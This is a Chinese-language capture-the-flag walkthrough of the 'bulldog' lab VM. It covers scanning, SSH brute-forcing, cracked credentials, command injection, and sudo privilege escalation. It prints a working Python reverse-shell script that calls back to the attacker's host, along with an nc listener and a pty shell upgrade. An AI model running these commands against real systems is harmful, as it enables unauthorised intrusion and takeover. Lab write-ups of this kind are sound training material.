实验环境
靶机:bulldog
测试机:win10 ,kali
实验过程
信息收集
1.主机发现
靶机ip:192.168.238.146
2.端口扫描
先用masscan进行快速全面的扫描
nmap扫描得到端口服务信息
3.目录扫描
访问80,web服务进行目录扫描
4.web站指纹
以python环境搭建web
5.漏洞发现
1.尝试ssh弱口令:利用msf,hydra等
msf:
设置参数
set pass_file pwd.txt
set rport 23
set rhost 192.168.238.146
set verbose true
run
2.web漏洞
查看目录扫描结果发现:后台登录口: http://192.168.238.131/admin
尝试:sql注入,弱口令,万能密码等尝试登录
webshell界面:http://192.168…238.131/dev
需要身份验证
审查元素发现疑似数据库用户名密码
md5解密
尝试在admin页面,和ssh登录
成功登录admin,但提示不允许仍和编辑操作
回到需身份验证的web界面
发现命令执行漏洞
漏洞利用
结合命令执行写python反弹shell脚本
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.238.131",8080))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
将脚本放在var/www/html下开启apache服务,下载至靶机
kali :nc -nvlp 8080 监听8080端口
拿到shell
提权
python 开启一个终端:
python -c 'import pty; pty.spawn("/bin/bash")'
常规三连 :whoami ,uname -a ,cat etc/issue
在/home/bulldogadmin/.hiddenadmindirectory 目录下 读取customPermissionApp文件
strings customPermissionApp
找到类似密码: SUPERultimatePASSWORDyouCANTget
sudo命令拿到权限
总结
主机发现,nmap -sn ,netdiscover等扫描工具;端口扫描,先masscan进行快速大量的扫描,在nmap 指定端口进行版本,服务等信息搜集,whatweb 进行网站指纹,cms扫描,对收集到的服务版本进行进一步手段,ssh爆破(msf,hydra),登陆口(弱口令,sql注入,万能密码),命令执行漏洞(反弹shell);得到shell后可用python弹一个终端进行操作;提权 :查找关键性文件(apache配置文件,etc/passwd等),查看当前用户是否在sudo组里(sudo su命令输入当前用户密码)